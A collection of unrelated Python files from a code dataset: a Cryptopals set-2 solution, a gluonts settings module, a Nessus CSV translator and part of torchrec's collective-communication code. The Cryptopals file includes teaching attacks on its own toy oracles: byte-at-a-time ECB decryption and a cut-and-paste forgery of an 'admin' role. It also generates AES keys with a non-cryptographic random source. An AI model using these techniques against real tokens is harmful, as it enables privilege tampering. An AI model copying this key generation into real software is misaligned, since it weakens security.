assert log_prior == pytest.approx(0.108888, 1.0e-4)
|
StarcoderdataPython
|
1684795
|
<gh_stars>0
import unittest
import random
from Crypto.Cipher import AES
from set1 import fromAscii, toAscii, fromB64
from set1 import fixedXor
from set1 import isECBEncrypted
def pkcs7Padding(data, blockSize=16):
missingBytesNumber = (-len(data))%blockSize
if missingBytesNumber == 0:
missingBytesNumber = blockSize
return data + bytes([missingBytesNumber for _ in range(missingBytesNumber)])
def pkcs7Unpadding(data):
paddingLength = int(data[len(data)-1])
return data[:-paddingLength]
def encryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
block = fixedXor(data[blockNumber*16:(blockNumber+1)*16], iv)
iv = AES.new(key, AES.MODE_ECB).encrypt(block)
res += iv
return res
def decryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
decryptedBlock = AES.new(key, AES.MODE_ECB).decrypt(data[blockNumber*16:(blockNumber+1)*16])
res += fixedXor(decryptedBlock, iv)
iv = data[blockNumber*16:(blockNumber+1)*16]
return res
def getRandomAESKey():
return bytes([random.randrange(0,256) for _ in range(16)])
UNKNOWN_AES_KEY = getRandomAESKey()
def oracle(data, key=None):
data = bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))]) + data
data += bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))])
data = pkcs7Padding(data)
isECB = True if random.randrange(2) == 0 else False
key = getRandomAESKey() if key == None else key
if isECB:
return AES.new(key).encrypt(data), isECB, key
else:
return encryptAESCBC(data, key), isECB, key
def encryptAESECBWithFixedSuffix(data, key=None, suffix=None):
# Default suffix comes from challenge 12
suffix = fromB64('<KEY>') if suffix == None else suffix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(data+suffix))
def encryptAESECBWithFixedPrefixSuffix(data, key=None, suffix=None, prefix=None):
# Default suffix comes from challenge 12
suffix = fromB64('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK') if suffix == None else suffix
prefix = fromAscii('Thats our fixed-length prefix') if prefix == None else prefix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(prefix+data+suffix))
def guessOracleBlockSize(oracle):
dataLength, ciphered = 0, oracle(bytes(0))
firstLength = len(ciphered)
while len(ciphered) == firstLength:
dataLength += 1
ciphered = oracle(bytes(dataLength))
blockSize = len(ciphered) - firstLength
dataLength -= 1
suffixLength = firstLength - dataLength
return blockSize, suffixLength
def guessSuffix(oracle):
blockSize, suffixLength = guessOracleBlockSize(oracle)
res = []
data = bytes(range(48,64))
foundBytes = 0
while foundBytes < suffixLength:
if (foundBytes % blockSize) == 0 and foundBytes > 0:
data = bytes(res[foundBytes-blockSize:foundBytes])
data = data[1:]
firstCipher = oracle(data)
targetBlock = firstCipher[(foundBytes//blockSize)*blockSize:(foundBytes//blockSize+1)*blockSize]
b, found = -1, False
while not(found):
b += 1
cipher = oracle(data + bytes(res[(foundBytes//blockSize)*blockSize:]) + bytes([b]))
found = (cipher[0:blockSize] == targetBlock)
res += [b]
foundBytes += 1
return bytes(res)
def parseKeyValue(string):
res = {}
for kv in string.split('&'):
key, value = kv.split('=')
res[key] = value
return res
def toKeyValueString(dic):
return '&'.join([key + '=' + str(dic[key]) for key in ['email', 'uid', 'role']])
def profileFor(email):
if '&' in email or '=' in email:
raise Exception('Illegal character in email: ' + email)
return toKeyValueString({'email': email, 'uid': 10, 'role': 'user'})
def encryptUserProfile(email):
return AES.new(UNKNOWN_AES_KEY).encrypt(pkcs7Padding(fromAscii(profileFor(email))))
def decryptUserProfile(data):
profileString = pkcs7Unpadding(AES.new(UNKNOWN_AES_KEY).decrypt(data))
return parseKeyValue(toAscii(profileString))
class Tester(unittest.TestCase):
def testChallenge9(self):
input = fromAscii('YELLOW SUBMARINE')
output = fromAscii('YELLOW SUBMARINE\x04\x04\x04\x04')
self.assertEqual(pkcs7Padding(input, 20), output)
def testChallenge10(self):
input = fromAscii('YELLOW SUBMARINEYELLOW SUBMARINE')
key = b'YELLOW SUBMARINE'
self.assertEqual(decryptAESCBC(encryptAESCBC(input, key), key), input)
with open('resources/set2-challenge10.txt', 'r') as testDataFile:
input = fromB64(testDataFile.read().replace('\n', ''))
self.assertIn(b'Let the witch doctor, Ice, do the dance to cure ', decryptAESCBC(input, key))
def testChallenge11(self):
for _ in range(100):
cipheredData, isECB, key = oracle(bytes(100))
self.assertEqual(isECB, isECBEncrypted(cipheredData))
def testChallenge12(self):
self.assertEqual(guessOracleBlockSize(encryptAESECBWithFixedSuffix)[0], 16)
self.assertEqual(True, isECBEncrypted(encryptAESECBWithFixedSuffix(bytes(100))))
suffix = guessSuffix(encryptAESECBWithFixedSuffix)
self.assertIn('The girlies on standby waving just to say hi', toAscii(suffix))
def testChallenge13(self):
input = '<EMAIL>'
cipheredProfile = encryptUserProfile(input)
clearProfile = decryptUserProfile(cipheredProfile)
self.assertEqual('user', clearProfile['role'])
# First, we build an email such that the length of the string "email=EMAIL&uid=10&role=" is a multiple of 16
email = ''.join('a' for _ in range(-(len("email=&uid=10&role="))%16))
email += '@letstrythis.com' # Adding a 16 characters-long string for style
honestCipher = encryptUserProfile(email)
# Then we build an email that will give us the cipher of 'admin\x0b\x0b...\x0b'
fakeEmail = ''.join(['a' for _ in range(10)])
fakeEmail += 'admin' + ''.join([chr(11) for _ in range(11)])
fakeProfileCipher = encryptUserProfile(fakeEmail)
adminBlock = fakeProfileCipher[16:32]
# And we replkace the end of our honestCipher with this block
tamperedCipher = honestCipher[:-16]
tamperedCipher += adminBlock
tamperedProfile = decryptUserProfile(tamperedCipher)
self.assertEqual(email, tamperedProfile['email'])
self.assertEqual('admin', tamperedProfile['role'])
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1681879
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
gluonts.core.settings
~~~~~~~~~~~~~~~~~~~~~
This modules offers a `Settings`-class, which allows to manage a global
context.
The idea is to support a form of dependency injection, where instead of passing
a concrete value along the call-chain, it is shared through the settings.
`gluonts.env` is a `Settings`.
Example::
from gluonts.core.settings import Settings
class MySettings(Settings):
debug: bool = False
settings = MySettings()
def fn():
if settings.debug:
print("In debug mode.")
with settings._let(debug=True):
# this will print the message
fn()
# no message will be printed
fn()
Another option is to inject the context to a function. This has the advantage,
that you can still manually pass values, but use the context as a fallback::
@settings._inject("debug")
def fn(debug):
...
# this will use the value defined in the context
fn()
# but one can still set the value manually
fn(False)
Value access is possible with both getitem (`setting["name"]`) and getattr
(`setting.name`). To avoid possible name-conflicts, all methods on `Settings`
use a leading underscore (e.g. `settings._let`). Consequently, keys are not
allowed to start with an underscore.
`Settings` contains a default-dictionary, which can be set to directly and is
used by `_declare`.
Additionally, it's possible to declare a type, which is checked using pydantic.
Whenever a new value is set, it is type-checked.
"""
import functools
import inspect
from operator import attrgetter
from typing import Any
import pydantic
class Dependency:
def __init__(self, fn, dependencies):
self.fn = fn
self.dependencies = dependencies
def resolve(self, env):
kwargs = {key: env[key] for key in self.dependencies}
return self.fn(**kwargs)
class _Config:
arbitrary_types_allowed = True
class Settings:
_cls_types: dict = {}
_cls_deps: dict = {}
def __init_subclass__(cls):
cls._cls_types = {}
for name, ty in cls.__annotations__.items():
if ty == Dependency:
cls._cls_deps[name] = getattr(cls, name)
else:
default = getattr(cls, name, ...)
cls._cls_types[name] = ty, default
def __init__(self, *args, **kwargs):
# mapping of key to type, see `_declare` for more info on how this
# works
self._types = {}
self._default = {}
self._dependencies = {}
self._context_count = 0
# We essentially implement our own chainmap, managed by a list. New
# entries appended to the right; thus, the chain acts as a stack. It is
# ensured that there are always at least two entries in the chain:
# A default, used to declare default values for any given key and a
# base to guard from writing to the default through normal access.
self._chain = [self._default, kwargs]
# If sublcassed, `_cls_types` can contain declarations which we need to
# execute.
for key, (ty, default) in self._cls_types.items():
self._declare(key, ty, default=default)
# Same thing for dependencies.
for name, fn in self._cls_deps.items():
self._dependency(name, fn)
def _reduce(self):
""""""
assert not self._context_count, "Cannot reduce within with-blocks."
compact = {}
for dct in self._chain[1:]:
compact.update(dct)
self._chain = [self._default, compact]
def _already_declared(self, key):
return key in self._types or key in self._dependencies
def _declare(self, key, type=Any, *, default=...):
assert not self._already_declared(
key
), f"Attempt of overwriting already declared value {key}"
# This is kinda hacky. For each key, we create a new pydantic model,
# which contains just one definition, effectively, like this:
#
# class foo(pydantic.BaseModel):
# foo: type
#
# When we want to evaluate, we do this:
#
# # given
# settings.foo = value
#
# # becomes
# settings._types["foo"].parse_obj({"foo": value}).foo
self._types[key] = pydantic.create_model(
key, **{key: (type, ...)}, __config__=_Config
)
# we use our own default-handling, instead of relying on pydantic
if default != ...:
self._set_(self._default, key, default)
def _dependency(self, name, fn):
dependencies = list(inspect.signature(fn).parameters)
for dependency in dependencies:
assert self._already_declared(
dependency
), f"`{name}` depends on `{dependency}`, which has not been declared yet."
self._dependencies[name] = Dependency(fn, dependencies)
def _get(self, key, default=None):
"""Like `dict.get`."""
try:
return self[key]
except KeyError:
return default
def __contains__(self, key):
try:
self[key]
return True
except KeyError:
return False
def __getitem__(self, key):
# Iterate all dicts, last to first, and return value as soon as one is
# found.
if key in self._dependencies:
return self._dependencies[key].resolve(self)
for dct in reversed(self._chain):
try:
return dct[key]
except KeyError:
pass
raise KeyError(key)
def __getattribute__(self, key):
# We check the key, to check whether we want to acces our chainmap
# or handle it as a normal attribute.
if key.startswith("_"):
return super().__getattribute__(key)
else:
return self[key]
def _set_(self, dct, key, value):
"""Helper method to assign item to a given dictionary.
Uses `_types` to type-check the value, before assigning.
"""
assert key not in self._dependencies, "Can't override dependency."
# If we have type-information, we apply the pydantic-model to the value
model = self._types.get(key)
if model is not None:
# If `settings.foo` is a pydantic model, we want to allow partial
# assignment: `settings.foo = {"b": 1}` should only set `b`
# Thus we check whether we are dealing with a pydantic model and if
# we are also assigning a `dict`:
is_pydantic_model = issubclass(
model.__fields__[key].type_, pydantic.BaseModel
)
if is_pydantic_model and isinstance(value, dict):
value = self[key].copy(update=value)
else:
value = getattr(model.parse_obj({key: value}), key)
dct[key] = value
def __setitem__(self, key, value):
# Always assigns to the most recent dictionary in our chain.
self._set_(self._chain[-1], key, value)
def __setattr__(self, key, value):
# Same check as in `__getattribute__`.
if key.startswith("_"):
super().__setattr__(key, value)
else:
self[key] = value
def _push(self, **kwargs):
"""Add new entry to our chain-map.
Values are type-checked.
"""
self._chain.append({})
# Since we want to type-check, we add the entries manually.
for key, value in kwargs.items():
self[key] = value
return self
def _pop(self):
assert len(self._chain) > 2, "Can't pop initial setting."
return self._chain.pop()
def __repr__(self):
inner = ", ".join(list(repr(dct) for dct in self._chain))
return f"<Settings [{inner}]>"
def _let(self, **kwargs) -> "_ScopedSettings":
"""Create a new context, where kwargs are added to the chain::
with settings._let(foo=42):
assert settings.foo = 42
`_let` does not push a new context, but returns a `_ScopedSettings`
object, that pushes the context, when entered through a
`with`-statement.
"""
return _ScopedSettings(self, kwargs)
def _inject(self, *keys, **kwargs):
"""Dependency injection.
This will inject values from settings if avaiable and not passed
directly::
@settings._inject("foo")
def fn(foo=1):
return foo
# Since foo is not available in settings, the functions default
# value is taken.
assert fn() == 1
with settings._let(foo=2):
# Since foo is declared in the settings, it is used.
assert fn() == 2
# Directly passed values always take precedence.
assert fn(3) == 3
"""
def dec(fn):
# We need the signature to be able to assemble the args later.
sig = inspect.signature(fn)
getters = {}
for key in keys:
assert key in sig.parameters, f"Key {key} not in arguments."
getters[key] = attrgetter(key)
for key, path in kwargs.items():
assert key in sig.parameters, f"Key {key} not in arguments."
assert key not in getters, f"Key {key} defined twice."
getters[key] = attrgetter(path)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
# arguments are always keyword params
arguments = sig.bind_partial(*args, **kwargs).arguments
setting_kwargs = {}
for key, getter in getters.items():
if key not in arguments:
try:
setting_kwargs[key] = getter(self)
except (KeyError, AttributeError):
continue
return fn(**arguments, **setting_kwargs)
return wrapper
return dec
class _ScopedSettings:
def __init__(self, settings, kwargs):
self.settings = settings
self.kwargs = kwargs
def __enter__(self):
self.settings._context_count += 1
return self.settings._push(**self.kwargs)
def __exit__(self, *args):
self.settings._context_count -= 1
self.settings._pop()
def let(settings, **kwargs):
"`let(settings, ...)` is the same as `settings._let(...)`."
return settings._let(**kwargs)
def inject(settings, *args, **kwargs):
"`inject(settings, ...)` is the same as `settings._inject(...)`."
return settings._inject(*args, **kwargs)
|
StarcoderdataPython
|
46692
|
# coding: utf-8
# !/usr/bin/env python3
import csv
import os, os.path
import sys
import argparse
from WriteExcel import Excel
from log import debug, info, error
from baidu_traslate import *
class Nessus(object):
"""处理Nessus扫描结果"""
def __init__(self, csv_name):
self.csv_name = csv_name
self.all_csv_res = []
if os.path.isfile(self.csv_name):
os.chdir(os.path.dirname(os.path.abspath(self.csv_name)))
self.read_csv(self.csv_name)
else:
os.chdir(self.csv_name)
self.file_list = [file for file in os.listdir() if os.path.isfile(file) and file.endswith('.csv')]
for file in self.file_list:
debug(file)
self.read_csv(file)
def __len__(self):
return len(self.all_csv_res)
def __iter__(self):
return iter(self.all_csv_res)
def __next__(self):
pass
def read_csv(self, file):
with open(file, 'r') as csv_file:
csv_res = csv.reader(csv_file)
debug(csv_res)
for row in csv_res:
debug(row)
if row not in self.all_csv_res:
self.all_csv_res.append(row)
all_res = self.all_csv_res
return all_res
def check_risk(risk):
if risk == 'None':
return 'None'
elif risk == 'Low':
return '低危'
elif risk == 'Medium':
return '中危'
elif risk == 'High':
return '高危'
elif risk == 'Critical':
return '严重'
def get_args():
parser = argparse.ArgumentParser(prog='nessusor', description='默认在程序目录下生成xls格式文档')
parser.add_argument("-p", help="输入报告所在目录或Nessus所在的完整路径", type=str)
parser.add_argument("-s", help="保存的文件名称", type=str)
args = parser.parse_args()
return vars(args)
if __name__ == '__main__':
args = get_args()
path = args['p']
output = args['s']
if path is None or output is None:
print("""python3 Nessus.py -p /path/nessus.csv or /path -s xxx""")
sys.exit(0)
try:
# nessus = Nessus('/Users/m1k3/127_0_0_1_yi2b5q.csv')
nessus = Nessus(path)
new_nessus = []
for i in nessus:
risk = check_risk(i[3])
if risk == 'None':
pass
# CVE CVSS Risk Host Protocol Port Name Synopsis Description Solution
else:
name = translate(i[7])
synopsis = translate(i[8])
description = translate(i[9])
solution = translate(i[10])
row = (i[1], i[2], risk, i[4], i[5], i[6], name, synopsis, description, solution)
# info(list(row))
new_nessus.append(list(row))
excel = Excel(output + '.xls', '/Users/m1k3', new_nessus)
excel.write_data()
except (Exception,KeyboardInterrupt) as e:
error(e)
|
StarcoderdataPython
|
101896
|
<filename>torchrec/distributed/comm_ops.py
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass, field
from typing import List, Optional, Tuple, TypeVar, Any
import torch
import torch.distributed as dist
from torch import Tensor
from torch.autograd import Function
from torch.autograd.profiler import record_function
from torchrec.distributed.types import Awaitable, NoWait
try:
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops")
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops_cpu")
except OSError:
pass
# OSS
try:
import fbgemm_gpu # @manual # noqa
except ImportError:
pass
W = TypeVar("W")
# TODO: T96382816, NE Parity Backward compatibility
GRADIENT_DIVISION: bool = True
def set_gradient_division(val: bool) -> None:
global GRADIENT_DIVISION
GRADIENT_DIVISION = val
# Some commonly used notations for comm ops:
# B - batch size
# T - number of embedding tables
# D - embedding dimension
class Request(Awaitable[W]):
"""
Defines a collective operation request for a process group on a tensor.
Constructor Args:
pg (dist.ProcessGroup): The process group the request is for.
"""
# pyre-fixme[11]: Annotation `ProcessGroup` is not defined as a type.
def __init__(self, pg: dist.ProcessGroup) -> None:
super().__init__()
self.pg: dist.ProcessGroup = pg
# pyre-fixme[11]: Annotation dist.Work is not defined as a type.
self.req: Optional[dist.Work] = None
self.tensor: Optional[W] = None
self.a2ai = None # type: ignore
self.rsi = None # type: ignore
self.wait_function = None # type: ignore
def _wait_impl(self) -> W:
"""
Calls the wait function for this request.
"""
ret = self.wait_function.apply(self.pg, self, self.tensor)
self.req = None
self.tensor = None
return ret
@dataclass
class All2AllPooledInfo(object):
"""
The data class that collects the attributes when calling the alltoall_pooled
operation.
Attributes:
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
dim_sum_per_rank_tensor (Optional[Tensor]): the tensor version of
`dim_sum_per_rank`, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
cumsum_dim_sum_per_rank_tensor (Optional[Tensor]): cumulative sum of
dim_sum_per_rank, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
mixed_dim (bool): the flag whether the input is mixed
dimensioned or not.
D (int): embedding dimension of the embedding table.
B_local (int): local batch size before scattering.
"""
dim_sum_per_rank: List[int]
dim_sum_per_rank_tensor: Optional[Tensor]
cumsum_dim_sum_per_rank_tensor: Optional[Tensor]
mixed_dim: bool
D: int = -1 # -1 means doesn't use
B_local: int = -1
@dataclass
class All2AllSequenceInfo(object):
"""
The data class that collects the attributes when calling the alltoall_sequence
operation.
Attributes:
embedding_dim (int): embedding dimension.
lengths_after_sparse_data_all2all (Tensor): lengths of sparse features after
AlltoAll.
forward_recat_tensor (Tensor): recat tensor for forward.
backward_recat_tensor (Tensor): recat tensor for backward.
input_splits (List[int]): input splits.
output_splits (List[int]): output splits.
lengths_sparse_before_features_all2all (Optional[Tensor]): lengths of sparse
features before AlltoAll.
"""
embedding_dim: int
lengths_after_sparse_data_all2all: Tensor
forward_recat_tensor: Tensor
backward_recat_tensor: Tensor
input_splits: List[int]
output_splits: List[int]
permuted_lengths_after_sparse_data_all2all: Optional[Tensor] = None
@dataclass
class All2AllVInfo(object):
"""
The data class that collects the attributes when calling the alltoallv operation.
Attributes:
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
B_global (int): global batch size for each rank.
B_local (int): local batch size before scattering.
B_local_list: (List[int]): local batch sizes for each embedding table locally
(in my current rank).
D_local_list (List[int]): embedding dimension of each embedding table locally
(in my current rank).
input_split_sizes (List[int]): The input split sizes for each rank, this
remembers how to split the input when doing the all_to_all_single operation.
output_split_sizes (List[int]): The output split sizes for each rank, this
remembers how to fill the output when doing the all_to_all_single operation.
"""
dims_sum_per_rank: List[int]
B_global: int
B_local: int
B_local_list: List[int]
D_local_list: List[int]
input_split_sizes: List[int] = field(default_factory=list)
output_split_sizes: List[int] = field(default_factory=list)
@dataclass
class ReduceScatterInfo(object):
"""
The data class that collects the attributes when calling the reduce_scatter_pooled
operation.
Attributes:
input_sizes (List[int]): the sizes of the input tensors. This remembers the
sizes of the input tensors when running the backward pass and producing the
gradient.
"""
input_sizes: List[int]
def _get_split_lengths_by_len(
world_size: int, my_rank: int, n: int
) -> Tuple[int, List[int]]:
k, m = divmod(n, world_size)
if m == 0:
splits = [k] * world_size
my_len = k
else:
splits = [(k + 1) if i < m else k for i in range(world_size)]
my_len = splits[my_rank]
return (my_len, splits)
def alltoall_pooled(
a2a_pooled_embs_tensor: Tensor,
dim_sum_per_rank: List[int],
mixed_dim: bool = False,
dim_sum_per_rank_tensor: Optional[Tensor] = None,
cumsum_dim_sum_per_rank_tensor: Optional[Tensor] = None,
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs AlltoAll operation for a single pooled embedding tensor. Each process
splits the input pooled embeddings tensor based on the world size, and then scatters
the split list to all processes in the group. Then concatenates the received tensors
from all processes in the group and returns a single output tensor.
Args:
a2a_pooled_embs_tensor (Tensor): input pooled embeddings. Must be pooled
together before passing into this function. Usually with the shape of
B x T x D, where B - batch size, T - number of embedding tables,
D - embedding dimension. When `mixed_dim=True`, the input shape should be
B x D_local_sum, where D_local_sum is the dimension sum of all the local
embedding tables.
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
mixed_dim (bool): the flag whether the input is mixed dimensioned or not.
dim_sum_per_rank_tensor (Optional[Tensor]): the tensor version of
`dim_sum_per_rank`, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
cumsum_dim_sum_per_rank_tensor (Optional[Tensor]): cumulative sum of
dim_sum_per_rank, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`alltoall_pooled` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(a2a_pooled_embs_tensor)
myreq = Request(group)
a2ai = All2AllPooledInfo(
dim_sum_per_rank=dim_sum_per_rank,
dim_sum_per_rank_tensor=dim_sum_per_rank_tensor,
cumsum_dim_sum_per_rank_tensor=cumsum_dim_sum_per_rank_tensor,
mixed_dim=mixed_dim,
)
# pyre-fixme[16]: `All2All_Pooled_Req` has no attribute `apply`.
All2All_Pooled_Req.apply(group, myreq, a2ai, a2a_pooled_embs_tensor)
return myreq
def alltoall_sequence(
# (T, B, L_i * D) flattened
a2a_sequence_embs_tensor: Tensor,
forward_recat_tensor: Tensor,
backward_recat_tensor: Tensor,
lengths_after_sparse_data_all2all: Tensor,
input_splits: List[int],
output_splits: List[int],
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs AlltoAll operation for sequence embeddings. Each process splits the input
tensor based on the world size, and then scatters the split list to all processes in
the group. Then concatenates the received tensors from all processes in the group
and returns a single output tensor.
Note:
AlltoAll operator for (T * B * L_i, D) tensors.
Does not support mixed dimensions.
Args:
a2a_sequence_embs_tensor (Tensor): input embeddings. Usually with the shape of
(T * B * L_i, D), where B - batch size, T - number of embedding tables,
D - embedding dimension.
forward_recat_tensor (Tensor): recat tensor for forward.
backward_recat_tensor (Tensor): recat tensor for backward.
lengths_after_sparse_data_all2all (Tensor): lengths of sparse features after
AlltoAll.
input_splits (Tensor): input splits.
output_splits (Tensor): output splits.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`alltoall_sequence` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(a2a_sequence_embs_tensor)
myreq = Request(group)
a2ai = All2AllSequenceInfo(
embedding_dim=a2a_sequence_embs_tensor.shape[1],
lengths_after_sparse_data_all2all=lengths_after_sparse_data_all2all,
forward_recat_tensor=forward_recat_tensor,
backward_recat_tensor=backward_recat_tensor,
input_splits=input_splits,
output_splits=output_splits,
)
# sequence of embeddings, bags are definitely non-uniform
# pyre-fixme[16]: `All2All_Seq_Req` has no attribute `apply`.
All2All_Seq_Req.apply(group, myreq, a2ai, a2a_sequence_embs_tensor)
return myreq
def alltoallv(
inputs: List[Tensor],
out_split: Optional[List[int]] = None,
per_rank_split_lengths: Optional[List[int]] = None,
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[List[Tensor]]:
"""
Performs alltoallv operation for a list of input embeddings. Each process scatters
the list to all processes in the group.
Args:
input (List[Tensor]): list of tensors to scatter, one per rank. The tensors in
the list usually have different lengths.
out_split (Optional[List[int]]): output split sizes (or dim_sum_per_rank), if
not specified, we will use `per_rank_split_lengths` to construct a output
split with the assumption that all the embs have the same dimension.
per_rank_split_lengths (Optional[List[int]]): split lengths per rank. If not
specified, the `out_split` must be specified.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
list of tensors.
.. warning::
`alltoallv` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
world_size = dist.get_world_size(group)
my_rank = dist.get_rank(group)
myreq = Request(group)
B_global, _ = inputs[0].size()
D_local_list = [e.size()[1] for e in inputs]
B_local, B_local_list = _get_split_lengths_by_len(world_size, my_rank, B_global)
if out_split is not None:
dims_sum_per_rank = out_split
elif per_rank_split_lengths is not None:
# all the embs have the same dimension
dims_sum_per_rank = [s * D_local_list[0] for s in per_rank_split_lengths]
else:
raise RuntimeError("Need to specify either out_split or per_rank_split_lengths")
a2ai = All2AllVInfo(
dims_sum_per_rank=dims_sum_per_rank,
B_local=B_local,
B_local_list=B_local_list,
D_local_list=D_local_list,
B_global=B_global,
)
# pyre-fixme[16]: `All2Allv_Req` has no attribute `apply`.
All2Allv_Req.apply(group, myreq, a2ai, inputs)
return myreq
def reduce_scatter_pooled(
inputs: List[Tensor],
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs reduce-scatter operation for a pooled embeddings tensor split into world
size number of chunks. The result of the reduce operation gets scattered to all
processes in the group. Then concatenates the received tensors from all processes in
the group and returns a single output tensor.
Args:
inputs (List[Tensor]): list of tensors to scatter, one per rank.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`reduce_scatter_pooled` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(inputs[dist.get_rank(group)])
myreq = Request(group)
rsi = ReduceScatterInfo(input_sizes=[tensor.size() for tensor in inputs])
# pyre-fixme[16]: `ReduceScatter_Req` has no attribute `apply`.
ReduceScatter_Req.apply(group, myreq, rsi, *inputs)
return myreq
# TODO: improve performance of _recat_pooled_embedding_grad_out and
# recat_pooled_embedding_mixed_dim_grad_out, see T87591139
def _recat_pooled_embedding_grad_out(
grad_output: Tensor, num_features_per_rank: List[int]
) -> Tensor:
"""
TODO: improve performance of _recat_pooled_embedding_grad_out in an
efficient fashion (the .contiguous() calls are extremely expensive).
see T87591139
"""
grad_outputs_by_rank = grad_output.split(num_features_per_rank, dim=1)
return torch.cat(
[
grad_output_by_rank.contiguous().view(-1)
for grad_output_by_rank in grad_outputs_by_rank
],
dim=0,
)
def _recat_seq_embedding(
input_embeddings: Tensor,
split_sizes: List[int],
T_local: int,
my_size: int,
forward: bool,
) -> Tensor:
seq_embeddings_by_rank = input_embeddings.split(split_sizes)
if forward:
return torch.cat(
[
seq_embeddings_by_rank[t * my_size + i]
# .contiguous().view(-1)
for i in range(my_size)
for t in range(T_local)
],
dim=0,
)
else:
return torch.cat(
[
seq_embeddings_by_rank[i * T_local + t]
# .contiguous()
# .view(-1)
for t in range(T_local)
for i in range(my_size)
],
dim=0,
)
class All2All_Pooled_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllPooledInfo,
input_embeddings: Tensor,
) -> Tensor:
world_size = dist.get_world_size(pg)
if a2ai.mixed_dim:
(B_global, D_local_sum) = input_embeddings.shape
else:
(B_global, T_local, D) = input_embeddings.shape
D_local_sum = T_local * D
a2ai.D = D
dim_sum_per_rank = a2ai.dim_sum_per_rank
B_local = B_global // world_size
a2ai.B_local = B_local
assert (
B_global % world_size == 0
), f"num of ranks {world_size} doesn't divide global batch size {B_global}"
sharded_input_embeddings = input_embeddings.view(
world_size, B_local, D_local_sum
)
D_global_sum = sum(dim_sum_per_rank)
sharded_output_embeddings = torch.empty(
B_local * D_global_sum,
dtype=input_embeddings.dtype,
device=input_embeddings.device,
)
with record_function("## alltoall_fwd_single ##"):
req = dist.all_to_all_single(
output=sharded_output_embeddings,
input=sharded_input_embeddings,
output_split_sizes=[
B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank
],
input_split_sizes=None,
group=pg,
async_op=True,
)
assert (
sum(B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank)
== B_local * D_global_sum
)
myreq.req = req
myreq.tensor = sharded_output_embeddings
myreq.a2ai = a2ai
myreq.wait_function = All2All_Pooled_Wait
ctx.myreq = myreq
ctx.pg = pg
ctx.mixed_dim = a2ai.mixed_dim
return sharded_output_embeddings
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused) -> Tuple[None, None, None, Tensor]:
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_output = myreq.tensor
if ctx.mixed_dim:
(W, B_local, D_local_sum) = grad_output.shape
grad_input = grad_output.view(W * B_local, D_local_sum)
else:
(W, B_local, T_local, D) = grad_output.shape
grad_input = grad_output.view(W * B_local, T_local, D)
if GRADIENT_DIVISION:
grad_input.div_(dist.get_world_size(ctx.pg))
